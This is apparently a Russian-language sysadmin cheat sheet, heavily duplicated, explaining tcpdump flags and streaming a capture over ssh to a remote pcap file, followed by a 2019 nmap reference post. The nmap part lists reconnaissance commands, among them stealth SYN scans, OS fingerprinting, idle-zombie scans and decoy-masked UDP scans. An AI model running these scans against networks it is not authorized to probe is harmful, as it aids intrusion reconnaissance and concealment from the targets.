dst 192.168.55.60: Фильтрует пакеты по IP-адресу назначения 192.168.55.60.

Пример:
tcpdump -n -vvv -X  port 4000 and dst 192.168.55.60

Возможные параметры:

-n: Не преобразовывать IP-адреса и порты в имена.

-vvv: Включает максимально подробный вывод.

-X: Показывает содержимое пакетов в шестнадцатеричном и ASCII форматах.

-i fm1-mac3: Указывает сетевой интерфейс fm1-mac3 для захвата пакетов.

port 4000: Фильтрует пакеты по порту 4000.

src 192.168.55.60: Фильтрует пакеты по IP-адресу источника 192.168.55.60.

dst 192.168.55.60: Фильтрует пакеты по IP-адресу назначения 192.168.55.60.

Пример:

tcpdump -n -vvv -X port 4000 and dst 192.168.55.60

Wireshark to file

tcpdump: Утилита для захвата сетевых пакетов.
-vvv: Увеличивает уровень детализации выводимой информации. -v дает более подробную информацию, -vv еще больше, и -vvv максимально подробный вывод.
-n: Не разрешать IP-адреса и порты в имена. Это делает вывод более быстрым и менее загроможденным.
-X: Показывает содержимое пакетов как в шестнадцатеричном, так и в ASCII форматах. Полезно для детального анализа содержимого пакетов.
-i fm1-mac3: Указывает интерфейс fm1-mac3 для захвата пакетов. Убедитесь, что это имя вашего сетевого интерфейса.
port 4000: Фильтрует пакеты по порту 4000. Только пакеты, относящиеся к этому порту, будут захвачены.
and dst 192.168.55.60: Дополнительный фильтр, который захватывает только те пакеты, у которых IP-адрес назначения 192.168.55.60.
-w -: Указывает tcpdump записывать вывод в стандартный поток вывода (stdout) вместо файла. Это позволяет передавать данные через канал (pipe) к другой команде.

ssh: Утилита для безопасного подключения к удаленным системам через сеть.
wrstemp@192.168.16.168: Указывает пользователя (wrstemp) и IP-адрес удаленного компьютера (192.168.16.168), к которому будет выполнено подключение.
'cat > /home/wrstemp/capture.pcap': Команда, которая будет выполнена на удаленном компьютере. 
Она принимает ввод (в данном случае поток данных от tcpdump) и записывает его в файл /home/wrstemp/capture.pcap.


tcpdump -i fm1-mac3 port 4000 and src 192.168.55.60 and dst 192.168.55.60 -w - | ssh wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap'
tcpdump -vvv -n -X -i fm1-mac3 port 4000 and dst 192.168.55.60 -w - | ssh -v wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap'

tcpdump: Утилита для захвата сетевых пакетов.

-vvv: Увеличивает уровень детализации выводимой информации. -v дает более подробную информацию, -vv еще больше, и -vvv максимально подробный вывод.

-n: Не разрешать IP-адреса и порты в имена. Это делает вывод более быстрым и менее загроможденным.

-X: Показывает содержимое пакетов как в шестнадцатеричном, так и в ASCII форматах. Полезно для детального анализа содержимого пакетов.

-i fm1-mac3: Указывает интерфейс fm1-mac3 для захвата пакетов. Убедитесь, что это имя вашего сетевого интерфейса.

port 4000: Фильтрует пакеты по порту 4000. Только пакеты, относящиеся к этому порту, будут захвачены.

and dst 192.168.55.60: Дополнительный фильтр, который захватывает только те пакеты, у которых IP-адрес назначения 192.168.55.60.

-w -: Указывает tcpdump записывать вывод в стандартный поток вывода (stdout) вместо файла. Это позволяет передавать данные через канал (pipe) к другой команде.

ssh: Утилита для безопасного подключения к удаленным системам через сеть.

wrstemp@192.168.16.168: Указывает пользователя (wrstemp) и IP-адрес удаленного компьютера (192.168.16.168), к которому будет выполнено подключение.

'cat > /home/wrstemp/capture.pcap': Команда, которая будет выполнена на удаленном компьютере.

Она принимает ввод (в данном случае поток данных от tcpdump) и записывает его в файл /home/wrstemp/capture.pcap.

tcpdump -i fm1-mac3 port 4000 and src 192.168.55.60 and dst 192.168.55.60 -w - | ssh wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap'

tcpdump -vvv -n -X -i fm1-mac3 port 4000 and dst 192.168.55.60 -w - | ssh -v wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap'

kali \ virus \ rootkit \ вирусы \ защита

nmap \ сканер портов

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/01/05

nmap

nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста

nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp)

nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1

nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie 

nmap -O target.host.com - !!! информация о системе 

nmap -vv host.target.com  - !!! стандартный скан подробный вывод

nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт 

nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389

nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов

nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt  - Сканирование машин с ip от 10 по 250  и запись результата
nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования
nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24
nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24
nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)
nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS

nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС

nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты, 
                                         используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование

nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024), 
                                           с отменой ping-опросов и заносим результат в файл scan.txt

nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов, 
                                                     при этом маскируемся двумя хостами (третий наш).


nmap 10.0.0.1 - сканировать порты пк  с IP 10.0.0.1
nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод)
nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24
nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200)

nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста

nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp)

nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1

nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie

nmap -O target.host.com - !!! информация о системе

nmap -vv host.target.com - !!! стандартный скан подробный вывод

nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт

nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389

nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов

nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt - Сканирование машин с ip от 10 по 250 и запись результата

nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования

nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24

nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24

nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)

nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS

nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС

nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты,

используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование

nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024),

с отменой ping-опросов и заносим результат в файл scan.txt

nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов,

при этом маскируемся двумя хостами (третий наш).

nmap 10.0.0.1 - сканировать порты пк с IP 10.0.0.1

nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод)

nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24

nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200)

Некоторые другие полезные инструменты:

hping (http://www.hping.org) - сборщик/анализатор IP пакетов
fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов
round-robin - проверка хостов

hping (http://www.hping.org) - сборщик/анализатор IP пакетов

fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов

round-robin - проверка хостов

Пример:

nmap -sn 10.3.1.3-254 | grep "Nmap scan report" | cut -c `echo -e "Nmap scan report for" | wc -c`-50 > list-address-test.txt
for i in `cat list-address-test.txt` ; do echo -e "Подключаюсь к ${i}" &&  curl https://${i} --connect-timeout 2 ; done

1 2	nmap -sn 10.3.1.3-254 \| grep "Nmap scan report" \| cut -c `echo -e "Nmap scan report for" \| wc -c`-50 > list-address-test.txt for i in `cat list-address-test.txt` ; do echo -e "Подключаюсь к ${i}" && curl https://${i} --connect-timeout 2 ; done